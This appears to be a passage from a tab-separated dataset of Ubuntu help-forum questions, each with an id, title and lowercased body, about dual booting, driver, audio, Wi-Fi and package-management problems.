actual=d0 connection : 2 0x10* 0x11 node 0x1d [ pin complex ] wcaps 0x400581 : stereo pincap 0x00010034 : in out eapd detect eapd 0x2 : eapd pin default 0x400001f0 : [ n/a ] line out at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x40 : out unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10* 0x11 node 0x1e [ pin complex ] wcaps 0x400481 : stereo pincap 0x00000024 : in detect pin default 0x400001f0 : [ n/a ] line out at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x1f [ pin complex ] wcaps 0x400501 : stereo control : name= '' speaker phantom jack '' , index=0 , device=0 pincap 0x00000010 : out pin default 0x90170110 : [ fixed ] speaker at int n/a conn = analog , color = unknown defassociation = 0x1 , sequence = 0x0 misc = no_presence pin-ctls : 0x40 : out power states : d0 d1 d2 d3 d3cold epss power : setting=d3 , actual=d3 connection : 2 0x10* 0x11 node 0x20 [ pin complex ] wcaps 0x400781 : stereo digital pincap 0x00000010 : out pin default 0x400001f0 : [ n/a ] line out at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 1 0x12 node 0x21 [ audio output ] wcaps 0x611 : stereo digital converter : stream=0 , channel=0 digital : digital category : 0x0 iec coding type : 0x0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x5 ] : pcm ac3 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x22 [ pin complex ] wcaps 0x400781 : stereo digital pincap 0x00000010 : out pin default 0x400001f0 : [ n/a ] line out at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 1 0x21 node 0x23 [ pin complex ] wcaps 0x40040b : stereo amp-in amp-in caps : ofs=0x00 , nsteps=0x04 , stepsize=0x2f , mute=0 amp-in vals : [ 0x00 0x00 ] pincap 0x00000020 : in pin default 0x400001f0 : [ n/a ] line out at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x24 [ audio mixer ] wcaps 0x20050b : stereo amp-in amp-in caps : ofs=0x4a , nsteps=0x4a , stepsize=0x03 , mute=1 amp-in vals : [ 0x00 0x00 ] [ 0x00 0x00 ] power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10 0x11 node 0x25 [ vendor defined widget ] wcaps 0xf00000 : mono juan @ juan-a24 : ~ $ thanks for any help you can give
343389	can i install ubuntu without disturbing any files , without dual boot ?	i have been googling for a while , and it seems that what i read says ubuntu deletes the files on the partition i install it . i want to install it on the c drive , but i dont want to lose its current contents . is there any way for me to install ubuntu without disturbing any other files ( or any files other than the windows files ) ?
343390	how to remove intel 's open source technology center driver ?	i have downloaded and installed intel 's drivers from this link , following all instructions : https : //01.org/linuxgraphics/downloads/2013/intelr-linux-graphics-installer-version-1.0.2 however , i would like to return to stock ubuntu 's driver configuration . how would i go about doing this ? i 've found this link , but it 's only for ubuntu 12.10 : http : //theclonker.de/ ? p=89 according to synaptic , intel 's repository added the following packages locally ( may contain typos ; forgive me ) : i915-3.9-3.8-dkms intel-linux-graphics-installer libdrm-dev libdrm-intel1 libdrm-intel1 : i386 libdrm-nouveau2 libdrm-nouveau2 : i386 libdrm-radeon1 libdrm-radeon1 : i386 libdrm2 libdrm2 : i386 libkms1 libva-drm1 libva-egl1 libva-glx1 libva-tpi1 libva-wayland1 libva-x11-1 libva1 x11proto-input-dev xserver-xorg-video-intel i 'm not sure whether the above list is complete and/or exhaustive as to the changes the intel installer made . also important to note , intel 's instructions to delete their repository in software sources just flat-out does n't work . it removes the repository , but keeps the packages installed locally .
343394	what does the setting `` number of desktops '' in compizconfig settings manager do ?	i assume it creates multiple desktops ( not workspaces - i know the difference ) as the name so pragmatically implies . i set it to 2 , and if it does create multiple desktops i can not figure out how to switch between them . i 've googled and checked askubuntu .
343395	how do i prevent git from requiring sudo on every git command	i created a directory /var/www to store my web apps clone in . when i initially cloned the app from github it required me to use sudo and every time i do a git pull it 's requiring sudo . i 'm running into some problems because of this . for example , my ssh keys are not matching up . so when i do my git pull , i 'm having to use https instead of ssh and manually enter my username and password every time i want to pull and update my app . how do i configure this so i do n't have to use sudo every time i use git ?
343397	apt-get problems and errors : vim	i found this great link : how do i resolve unmet dependencies ? but i ca n't seem to get any command involving apt-get to run correctly . my main problem is a partition filling up and do n't know why , so i 'm trying to remove unneeded packages . ex : apt-get purge aspell-en returns : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : vim : depends : vim-runtime ( = 2:7.2.445+hg~cb94c42c0e1a-1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . this message happens no matter which apt-get command i choose , including those meant to fix the problem in the first place ! to make matters worse , my disk is 100 % full and i ca n't figure out how to fix . when i run : apt-get -f install , it says : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : vim-runtime the following new packages will be installed : vim-runtime 0 upgraded , 1 newly installed , 0 to remove and 228 not upgraded . 1 not fully installed or removed . need to get 6,207 kb of archives . after this operation , 26.0 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ftp.us.debian.org/debian/ squeeze/main vim-runtime all 2:7.2.445+hg~cb94c42c0e1a-1 [ 6,207 kb ] fetched 6,207 kb in 1s ( 3,907 kb/s ) ( reading database ... 131282 files and directories currently installed . ) unpacking vim-runtime ( from ... /vim-runtime_2 % 3a7.2.445+hg~cb94c42c0e1a-1_all.deb ) adding 'diversion of /usr/share/vim/vim72/doc/help.txt to /usr/share/vim/vim72/doc/help.txt.vim-tiny by vim-runtime' dpkg-divert : rename involves overwriting `/usr/share/vim/vim72/doc/help.txt.vim-tiny ' with different file `/usr/share/vim/vim72/doc/help.txt ' , not allowed dpkg : error processing /var/cache/apt/archives/vim- runtime_2 % 3a7.2.445+hg~cb94c42c0e1a-1_all.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 2 configured to not write apport reports no diversion 'diversion of /usr/share/vim/vim72/doc/help.txt by vim-runtime ' , none removed . no diversion 'diversion of /usr/share/vim/vim72/doc/tags by vim-runtime ' , none removed . errors were encountered while processing : /var/cache/apt/archives/vim-runtime_2 % 3a7.2.445+hg~cb94c42c0e1a-1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) if i try to remove vim-runtime , i get : package vim-runtime is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : vim : depends : vim-runtime ( = 2:7.2.445+hg~cb94c42c0e1a-1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
343405	how to get internet connection ilo 4	i 'm using ubuntu on my new hp proliant dl320e gen8 . i have the server connected to my local network but it looks like ubuntu do n't have a connection to the net . when i checked all attached devices i found a device called ilo 4 connected with the same mac address as my server . it looks like this ilo service stops any incoming/outgoing connections . does anyone know how to give ubuntu internet connection ? thanks in advance , carl
343407	linenumber of specific line in a file	i 'm fairly new to bash programming , and i am trying to figure out a way of `` grepping '' a line with a certain pattern from a rather long logfile and proceeding from the line i just got with grep -w `` pattern '' filename . i need to get to the line immediately preceding my grep-line . i thought i could access it via linenumbers , but i only ever seem to find solutions that read a certain line via linenumber , if i already know , what that linenumber is . any ideas ?
343410	can we execute a shell script by clicking	is it possible to double click and execute a shell script instead of executing the following `` ./xxxx.sh '' notation from command prompt ?
343412	dashboard for mobile broadbands	is there any dashboard for mobile broadband in ubuntu 13.04 ? like this
343420	uninnstall ubuntu , install windows 8	windows 8 i really want to replace ubuntu with windows 8 . i cant figure out how : o can someone please help me ? and yes , i have bought windows 8 . i have the ios file , but i also need help to create a bootable usb stick .
343427	why wo n't ubuntu terminal accept `` \ '' character ?	i ca n't get my terminal shell to accept a \ when i type it in . nothing happens . i 've googled but have n't seen anything which seems to address this . i have no idea where i would start to trouble shoot . edit : i can use the \ in eclipse , any text editor ( including nano or other command line tools ) . the exact command in question is : find -type f -exec chmod -x { } \ ; if i copy and paste that line in , the \ character disappears . if i then try and type it in , nothing happens . the only place this is a problem is int he actual shell command line . thanks . edit two : seems to be some confusion . if i copy the above command onto my command line , without pressing enter ( i.e not executing ) this is what is in my shell : $ find -type f -exec chmod -x { } ; if i then try and enter a \ to escape the ; the symbol does not appear . if i press enter at any time while this command has been entered in the above circumstances it fails to execute , due to the ; not being passed into the command . edit 3 : i 'm using gnome 3.4.1.1 on ubuntu 12.04 lts
343428	dual boot xp and ubuntu 12.04 with two drives -- fine point	i have read many if not all the posts related to dual booting , but i am not absolutely clear how to avoid clobbering my xp boot record in the process using the latest version of ubuntu . i have a computer with two sata drives . both drives have xp professional . i currently use drive 2 as a backup for drive 1 by imaging drive 1 on 2 as a bootable disk . drive 1 is an ssd and drive 2 is not . after i 'm done , i would like to have no change to drive 1 , ubuntu should be on drive 2 , and there should be a partition on drive 2 for data accessible by both xp and ubuntu . i would like xp removed from drive 2 . i have ubuntu on a cd and it works perfectly on my computer . ( 32 bit version ) . do i need to reformat drive 2 to ensure that ubuntu does n't preserve xp there ? do i need to change the boot order from the bios before i start the install ? do i need to keep the boot order changed in order to have the choice of operating system at start-up ? ( i do n't want to change the xp boot record on 1 ) what do i need to do to ensure that the data partition on 2 is accessible from both ubuntu and xp ? will i need to edit the boot file in ubuntu to make this work ? any help is appreciated . ( i have true image and a disk image on a usb drive , so recovery is always possible ) .
343432	how to uninstall ubuntu and grub from pre-installed windows 8 ?	i am about to install ubuntu to dual-boot on my pre-installed windows 8 laptop . before i do , i really need to know how to uninstall ubuntu safely if i do n't like it , or if i have to for some reason . i 've been searching for an answer to this , but i do not have any sort of windows 8 disc . at all . this laptop came with windows 8 , and i have no way to repair anything or things like that . so how would i go about uninstalling grub and ubuntu completely from my computer and restore the windows 8 boot manager with the circumstances that i 'm in ? i can not find any solution except booting into the installation cd and repairing things - which i do n't have .
343433	how to create links on desktop for end user when oem installation ( pre-install ) ?	i 'm pre-installing ubuntu 12.04 , following steps in webpage : how do i pre-install ubuntu for someone ( oem install ) ? and i would like to create links to the folder of /etc/myfiles/ on end user 's desktop , but the problem is : when doing customization with the user of oem , i do n't know the user name that the end user would create , so i can not just create links to /home/xxx/desktop . then i write a shell script to run in /etc/profile to create links when end user log in , but failed . then i called the shell script in /etc/rc.local , still failed . so , could anyone please help on `` how to create links on end user 's desktop when oem installation ? thanks in advance !
343435	when will my application be reviewed ?	i submitted an app to the ubuntu software centre through my apps on developer.ubuntu.com yesterday . will my app ever be reviewed or is my apps no longer used ? my app is free and i packaged it myself already so how long will the review process take ? how long until it gets reviewed ( it is currently pending review ) ? it is a small , mathematics tool with a gui . i built it in the ubuntu sdk with qt , and packaged it . it is free , and is called hcfs and lcms .
343438	why are partitons not automatically mounting ?	after installing ubuntu 12.04.3 lts , the windows 7 partition and an extra backup partition are no longer mounting automatically as they used to do in 10.04.2 lts . i have an ata harddisk . what could be the problem ? any insights will be highly appreciated .
343439	how to customize hotkeys	i want to customize hotkeys , but in a special way . there should be global shortcuts , like alt+tab , but i want to create window specific shortcuts . for example : ctrl+k does ctrl+pageup in chrome , but ctrl+k does pageup in libreoffice . it would be nice if global settings did n't work , except some windows specified . is there an application for this ?
343443	how to remove ( uninstall ) all games from kubuntu 12.04 using cli ?	i see that the list of installed games is rather long . if i remove them one by one it will take hours using commands such as : sudo apt-get purge kbounce there is a meta-package called kdegames , but removing it appeared to do nothing : sudo apt-get purge kdegames can anyone help me with a command that will remove all kde games ( and related libraries , etc . ) from my system ?
343444	gnome-screenshot copy to clipboard shortcut	i use mate as desktop viewer . how can i add a shortcut for taking a screenshot of a part of the windows and copy it to the clipboard ? basically what with gnome the command control-shift-stamp .
343445	drivers wirless and audio undetected sony vaio svf142c29u	i installed ubuntu 12.04 x64 in my notebook sony vaio svf142c29u and the wireless and audio drivers is not detected somebody know to do ? ? ? thanks
343446	wifi has trouble connecting/constantly disconnects in ubuntu	i am trying to connect to my uni 's public wifi in ubuntu . after an initial attempt that is usually successful , the connection drops after a few minutes ( sometimes < 1 ) . after that future attempts to connect may or may not be successful , but after a few initial successes i find myself completely unable to connect . i had this issue with this laptop before . i ended up buying and installing a new wifi card and ( if i remember correctly ) installing the proprietary drivers for it , which seemed to fix the issue . however , after reinstalling ubuntu over the summer the problem has re-surfaced , and now i ca n't seem to find the proprietary drivers i thought i had installed when i last had this issue . i do not have connectivity issues in windows on this laptop , so i 'm pretty sure this is a software/driver issues this is my wifi card 's lspci entry : 03:00.0 network controller : intel corporation centrino advanced-n 6205 [ taylor peak ] ( rev 34 ) and my lsmod : http : //paste.ubuntu.com/6041598/ i tried implementing the solution mentioned here : very slow connection on an intel ( r ) wifi link 5100 agn , which did not help my connectivity issues .
343450	ubuntu for lenovo thinkpad t60	can you recommend a most stable and compatible but fast ubuntu version for lenovo t60 2008-jl6 with 1 gb ram ? and where can i find all the other compatible driver for finger print , touch pad , etc ? where can i find the setup cd for your recommended version ?
343451	popup `` the software on this computer is up to date '' appearing constantly	a few days ago the software updater started popping `` the software on this computer is up to date '' every few minutes , even if no update occurred . it 's very annoying since the popup steals focus , regardless of what i 've done with it previously ( selected ok , closed on the x , ignored ) . the software updater is set to search for updates daily , downloading and installing security updates automatically , and suggesting only important security and recommended updates . does anyone know how to stop the onslaught of pointless dialogs ? i 'm using version 13.04 , completely updated ( as the popup helpfully indicates ) and i do have a few extra repositories added to my sources.list file , if that helps .
343452	my sound output is recognized as my sound input , how to fix it ?	i have a big problem , yesterday skype worked , but today nothing works . when i do a skype test call i hear nothing , and when i call with another person they hear my music and themselves twice . so my input is ignored and my output is treated as my sound input . what can i do to solve this ? i have pulseaudio as the audio service . also when i boot up the machine and go to sound settings it does n't see that i have my microphone plugged in , i have to remove it and plug it in again and then activate it via the toggle button . pulseaudio -- dump-conf # # # read from configuration file : /etc/pulse/daemon.conf # # # daemonize = no fail = yes high-priority = yes nice-level = -11 realtime-scheduling = yes realtime-priority = 5 allow-module-loading = yes allow-exit = yes use-pid-file = yes system-instance = no local-server-type = user cpu-limit = no enable-shm = yes flat-volumes = no lock-memory = no exit-idle-time = 20 scache-idle-time = 20 dl-search-path = /usr/lib/pulse-1.1/modules default-script-file = /etc/pulse/default.pa load-default-script-file = yes log-target = auto log-level = notice resample-method = speex-float-1 enable-remixing = yes enable-lfe-remixing = no default-sample-format = s16le default-sample-rate = 44100 default-sample-channels = 2 default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 deferred-volume-extra-delay-usec = 0 shm-size-bytes = 0 log-meta = no log-time = no log-backtrace = 0 rlimit-fsize = -1 rlimit-data = -1 rlimit-stack = -1 rlimit-core = -1 rlimit-rss = -1 rlimit-as = -1 rlimit-nproc = -1 rlimit-nofile = 256 rlimit-memlock = -1 rlimit-locks = -1 rlimit-sigpending = -1 rlimit-msgqueue = -1 rlimit-nice = 31 rlimit-rtprio = 9 rlimit-rttime = 1000000 amixer -c 0 simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 64 mono : playback 51 [ 80 % ] [ -13.00db ] [ on ] simple mixer control 'headphone',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 64 mono : front left : playback 63 [ 98 % ] [ 0.00db ] [ on ] front right : playback 63 [ 98 % ] [ 0.00db ] [ on ] simple mixer control 'speaker',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 64 mono : front left : playback 0 [ 0 % ] [ -63.00db ] [ off ] front right : playback 0 [ 0 % ] [ -63.00db ] [ off ] simple mixer control 'pcm',0 capabilities : pvolume penum playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 254 [ 100 % ] [ 0.20db ] front right : playback 254 [ 100 % ] [ 0.20db ] simple mixer control 'mic',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'mic boost',0 capabilities : volume penum playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 3 [ 100 % ] [ 30.00db ] front right : 3 [ 100 % ] [ 30.00db ] simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] simple mixer control 'beep',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'capture',0 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 46 front left : capture 20 [ 43 % ] [ 3.00db ] [ on ] front right : capture 20 [ 43 % ] [ 3.00db ] [ on ] simple mixer control 'auto-mute mode',0 capabilities : enum items : 'disabled ' 'enabled' item0 : 'enabled' simple mixer control 'digital',0 capabilities : cvolume penum capture channels : front left - front right limits : capture 0 - 120 front left : capture 60 [ 50 % ] [ 0.00db ] front right : capture 60 [ 50 % ] [ 0.00db ] pactl info server string : unix : /home/alvar/.pulse/0ccbfd82b4743aca7966222b0000000d-runtime/native library protocol version : 26 server protocol version : 26 is local : yes client index : 74 tile size : 65472 user name : alvar host name : root server name : pulseaudio server version : 1.1 default sample specification : s16le 2ch 44100hz default channel map : front-left , front-right default sink : alsa_output.pci-0000_00_08.0.analog-stereo default source : alsa_input.pci-0000_00_08.0.analog-stereo cookie : e46a : f38a
343453	my wireless is missing in the wireless list	after i replaced my windows 7 home in my packard bell easynote with ubuntu 13.04 desktop , everything works fine except my virginmedia superhub wireless . it 's not in the list of connections . when i installed ubuntu on my laptop , on the setup it did'nt say that my wireless was there . it works fine on my other computers . could anyone help me ? 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 ethernet controller : broadcom corporation netlink bcm57780 gigabit ethernet pcie ( rev 01 ) 02:00.0 network controller : broadcom corporation bcm43227 802.11b/g/n ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) davran @ davran-easynote-tk85 : ~ $ lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 ethernet controller : broadcom corporation netlink bcm57780 gigabit ethernet pcie ( rev 01 ) 02:00.0 network controller : broadcom corporation bcm43227 802.11b/g/n ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) davran @ davran-easynote-tk85 : ~ $ sudo lshw -c network pci ( sysfs ) *-network description : ethernet interface product : netlink bcm57780 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 01 serial : b8:70 : f4 : e9:01 : ea size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.128 duplex=full firmware=sb ip=192.168.0.20 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:44 memory : b3400000-b340ffff *-network description : wireless interface product : bcm43227 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : 00 serial : 94:39 : e5:02 : de:99 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : b2400000-b2403fff davran @ davran-easynote-tk85 : ~ $ davran @ davran-easynote-tk85 : ~ $ rfkill list all 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no thanks to user68186 .
343456	java plugin - firefox	having trouble getting java to work with firefox ( 22 ) , i have followed the advice in this question and on the official java site , but nothing seems to work . i have the latest java ( 1.7.0_25 ) in /opt/java and have set a symlink in /usr/libs/mozilla/plugins for the libnpjp2.so file . i can see the file in the terminal and java runs fine . however firefox shows nothing in about : plugins . i have also run export java_home= '' /opt/java/jre1.7.0_05/bin/java '' to be on the safe side . i know there are multiple plugin directories such as /usr/lib/firefox/plugins and /usr/lib/firefox-addons/plugins , but all my current plugins show they are located in /usr/lib/mozilla/plugins when viewing the about : plugins page . a bit stuck on where to go next ?
343457	chrome below the normal size	i 've been an ubuntu user for a while and this is the first time i have such a problem . it is quite difficult to explain so i attach a screenshot : . basically the font size is too small . in the screenshot i 've attached how i see chrome at 100 % zoom , as you see it is like if it was not taking the whole space at disposal . even the terminal , the buttons on top of the windows looks smaller . is it a choice of ubuntu 13.04 ? did i by mistake touch something wrong ?
343462	internet connection really slow on my ubuntu 12.04 using d-link dwa-510	i installed ubuntu today and i 'm now dual booting windows 8 and ubuntu 12.04 . for some reason , the wireless is really slow on my ubuntu . it works fine sometimes , but then gets really slow . i checked the connection on other laptops , ipads in my house and it works fine there . for some reason , ubuntu is slowing down my wireless . how should i go about debugging this ? output of lspci -v 05:01.0 network controller : ralink corp. rt2561/rt61 rev b 802.11g subsystem : d-link system inc dwa-510 wireless g desktop adapter flags : bus master , slow devsel , latency 32 , irq 19 memory at ea100000 ( 32-bit , non-prefetchable ) [ size=32k ] capabilities : < access denied > kernel driver in use : rt61pci kernel modules : rt61pci
343464	ubuntu 12.04 wifi issues macbook 7,1	ok , so i have a macbook pro 7,1 ( mid 2010 ) installed . i installed it a few months back and had a lot of problems trying to get the wireless to work . after much searching i found a solution , i believe i manually downloaded the correct drivers from somewhere and installed them with terminal ... something along those lines finally got it working . now due to issues with other partitions ( windows ) /refit i decided to start fresh and completely reinstall ubuntu as well . now i 'm in the same place again ... struggling to get my wireless to work . i 've tried tons of solutions with no luck and ca n't find the solution i used last time . any help would be much appreciated . some solutions i attempted include : -purging and reinstalling the drivers through terminal -using additional hardware ( broadcom fails ) -using the synaptic package manager -installing and blacklisting thanks ! !
343465	windows installation failed	tried installing windows with a installation cd , i deleted some partitions because it was an unknown partition ( which was used by ubuntu ) then the installation failed.now whenever i boot up my laptop i get a unknown file system grub rescue error . what can i do that will fix this error ? is there anything i can do ? i have already tried installing windows xp , but it does n't identify any hard drives . i 've placed a ubuntu installation dvd in the disk drive , but i do n't get the prompt to boot from disk . i 've also tried going into the grub menu by holding the shift key . it 'll say grub loading , followed by unknown file system .
343467	gnome 3.8 affects unity in ubuntu 13.04	i have installed gnome 3 just to try it using this command : sudo apt-get update & & sudo apt-get install gnome-shell ubuntu-gnome-desktop sudo reboot after this on log screen i have choice between unity and gnome desktop enviroment . gnome works fine but when i have rebooted machine and loged in a unity session there was a `` mixed unity '' . it was unity with gnome font , gnome dialogs and a gnome look terminal window . also when i boot machine there is a blue grub screen instead of ubuntu purple one . i have tried to restore unity sudo apt-get install unity but nothing was installed ( `` ... there is latest version ... '' ) . lastly i decided to remove gnome and tried ( from here ) : sudo apt-get remove libgtk-3-common sudo apt-get install ppa-purge sudo ppa-purge ppa : gnome3-team/gnome3 # this apt-get remove libgtk-3-common was deleted many things ... now i ca n't boot ubuntu anyway , when i choose ubuntu from grub ( this is dual boot ) there is just black screen and cursor in uper left corner . i have tried to automatically update grub by choosing appropriate option in recovery mode . i really do n't want to loose this instalation because there are many settings and software that i really need . how to solve this boot problem and how to remove gnome ? this is report from boot-repair- > boot-repair report . i also tried to install libgtk-3-common but libgtk-3-common is already the newest version libgtk-3-common set to manually installed and tried to sudo apt-get install ubuntu-desktop i have solved this unmet dependencies by : sudo cp /etc/apt/sources.list /etc/apt/sources.list.original sudo cp /var/lib/dpkg/status /var/lib/dpkg/status.original apt-get autoclean apt-get autoremove sudo apt-get -f install and then sudo apt-get install -- reinstall ubuntu-desktop works and now i can normally boot a gnome session but unity still have some problems . there is no launcher , upper line ...
343470	how to install artwiz lime ?	i am new to linux and i want to install a font called : lime . can anyone explain how to do that ? i see that they arent in the repos anymore . install artwiz fonts in ubuntu 12.04 only explains how to install snap .
343474	selective hdmi audio	is it possible to have some programs use hdmi audio out , and others use internal speakers ? specifically , i am trying to have vlc & rhythmbox use hdmi audio , and all other applications use internal speakers . ubuntu 13.04 , running on a lenovo y500 .
343475	12.04 logs session into small terminal window	i upgraded from 11.04 to 12.04 and when it was all finished i could n't login unless i went in as a guest . so following a lot of pages on here i deleted the ~/xauthority high seemed to work . however just before that i also ran sudo chmod -r $ user : $ user $ home now after i 've entered my password i get a small terminal window appear in the top left with me logged in . i ca n't seem to find anything around this . any ideas ? i ca n't help but think i 've set all the files to something they should n't all be .
343480	no hdmi sound with intel	i 've a problem which bothers me for days : the audio output via hdmi does not work anymore since i updated to ubuntu 13.04 ( it worked perfect with ubuntu 12 ) . a few datas : **cat /proc/version** linux version 3.8.0-30-generic ( buildd @ akateko ) ( gcc version 4.7.3 ( ubuntu/linaro 4.7.3-1ubuntu1 ) ) # 44-ubuntu smp thu aug 22 20:54:42 utc 2013 **aplay -l** **** liste der hardware-geräte ( playback ) **** karte 0 : intel [ hda intel ] , gerät 0 : alc262 analog [ alc262 analog ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 0 : intel [ hda intel ] , gerät 3 : alc262 digital [ alc262 digital ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 what i 've tried so far : updated the kernel to 3.9 mainline , but after that my keyboard stopped working ( roll back ) . checked alsamixer that everything is unmuted . run pavucontrol , to check the sound-output ( i can see the correct output device and the bar indicator moved , but i ca n't hear anything ) in the audio-settings „hdmi/displayport“ is selected installed the newest version of alsa-daily i red so many threads , but nothing resolves this issue . i would be very grateful if you could help me with this . best regards . i wanted to mention that i am a real ubuntu beginner ; )
